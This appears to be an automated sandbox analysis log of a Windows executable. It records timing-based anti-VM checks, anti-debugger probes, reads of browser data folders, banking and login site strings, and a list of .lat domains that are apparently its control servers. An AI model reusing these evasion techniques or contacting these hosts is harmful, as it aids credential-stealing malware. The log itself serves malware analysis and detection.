Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DDF33 second address: 2DDF55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119947h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DDF55 second address: 2DDF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DE278 second address: 2DE28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jnp 00007F0549119936h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DE28A second address: 2DE290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DE290 second address: 2DE298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DE298 second address: 2DE29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DE29E second address: 2DE2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119945h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E3390 second address: 2E3398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E3398 second address: 2E33A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0549119936h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E33A7 second address: 2E33AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E33AB second address: 2E33D4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F054911993Dh 0x00000012 jmp 00007F054911993Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E2834 second address: 2E283C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E283C second address: 2E2842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E2842 second address: 2E2846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E2846 second address: 2E2876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F054911993Ch 0x00000010 jl 00007F0549119936h 0x00000016 jnl 00007F054911994Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E2DB4 second address: 2E2DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F05491602E2h 0x00000010 jl 00007F05491602D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E3075 second address: 2E3083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E3083 second address: 2E3087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E3087 second address: 2E308D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E308D second address: 2E3093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E78EA second address: 2E78FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F0549119936h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EEDF5 second address: 2EEDFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EEDFA second address: 2EEE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EEE00 second address: 2EEE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EF87B second address: 2EF888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F0549119936h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EFB58 second address: 2EFB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EFB5E second address: 2EFB64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EE8E6 second address: 2EE8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2F65AF second address: 2F65B9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2F65B9 second address: 2F65BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2F61C3 second address: 2F61C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3065CA second address: 3065D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3065D1 second address: 3065E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 306052 second address: 306056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 306056 second address: 306078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F054911993Dh 0x0000000b pop edx 0x0000000c jng 00007F0549119957h 0x00000012 je 00007F0549119951h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3061F0 second address: 3061F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3080E7 second address: 3080EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 30EBAF second address: 30EBC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 30EBC5 second address: 30EBDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F054911993Eh 0x0000000b popad 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 30EBDE second address: 30EBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 317D29 second address: 317D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F0549119936h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 317D3A second address: 317D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 31CACD second address: 31CAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0A90 second address: 49E0ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C2DAh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F05491602E7h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0ABC second address: 49E0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0AC0 second address: 49E0AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0AC4 second address: 49E0ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0ACA second address: 49E0B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05491602DBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dx, F566h 0x00000017 pushfd 0x00000018 jmp 00007F05491602E7h 0x0000001d jmp 00007F05491602E3h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0B19 second address: 49E0BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F054911993Eh 0x00000011 test esi, esi 0x00000013 jmp 00007F0549119940h 0x00000018 je 00007F05BB357194h 0x0000001e pushad 0x0000001f push ecx 0x00000020 pushfd 0x00000021 jmp 00007F054911993Dh 0x00000026 sub si, D836h 0x0000002b jmp 00007F0549119941h 0x00000030 popfd 0x00000031 pop esi 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F0549119947h 0x00000039 adc eax, 4894556Eh 0x0000003f jmp 00007F0549119949h 0x00000044 popfd 0x00000045 popad 0x00000046 popad 0x00000047 cmp dword ptr [76C8459Ch], 05h 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 call 00007F054911993Fh 0x00000056 pop ecx 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0C72 second address: 49E0C96 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 2DA71AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05491602E7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0C96 second address: 49E0CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F054911993Bh 0x0000000b adc ax, E30Eh 0x00000010 jmp 00007F0549119949h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0549119948h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0CE8 second address: 49E0CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0CEC second address: 49E0CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0CF2 second address: 49E0CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0CF8 second address: 49E0CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0CFC second address: 49E0D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Special instruction interceptor: First address: C7B63 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Special instruction interceptor: First address: C7C3C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Special instruction interceptor: First address: 2F7BF7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\0gnHF2twcT.exe TID: 3404 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\0gnHF2twcT.exe TID: 3404 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\0gnHF2twcT.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\3D Objects
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Comms
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google
Source: 0gnHF2twcT.exe, 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0gnHF2twcT.exe, 00000000.00000003.1577677042.000000000527F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696494690p
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.0000000000999000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\0gnHF2twcT.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\0gnHF2twcT.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: NTICE
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: SICE
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: SIWVID
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: 0gnHF2twcT.exe String found in binary or memory: rapeflowwj.lat
Source: 0gnHF2twcT.exe String found in binary or memory: crosshuaht.lat
Source: 0gnHF2twcT.exe String found in binary or memory: sustainskelet.lat
Source: 0gnHF2twcT.exe String found in binary or memory: aspecteirs.lat
Source: 0gnHF2twcT.exe String found in binary or memory: energyaffai.lat
Source: 0gnHF2twcT.exe String found in binary or memory: necklacebudi.lat
Source: 0gnHF2twcT.exe String found in binary or memory: discokeyus.lat
Source: 0gnHF2twcT.exe String found in binary or memory: grannyejh.lat
Source: 0gnHF2twcT.exe String found in binary or memory: sweepyribs.lat
Source: 0gnHF2twcT.exe, 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ZProgram Manager
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
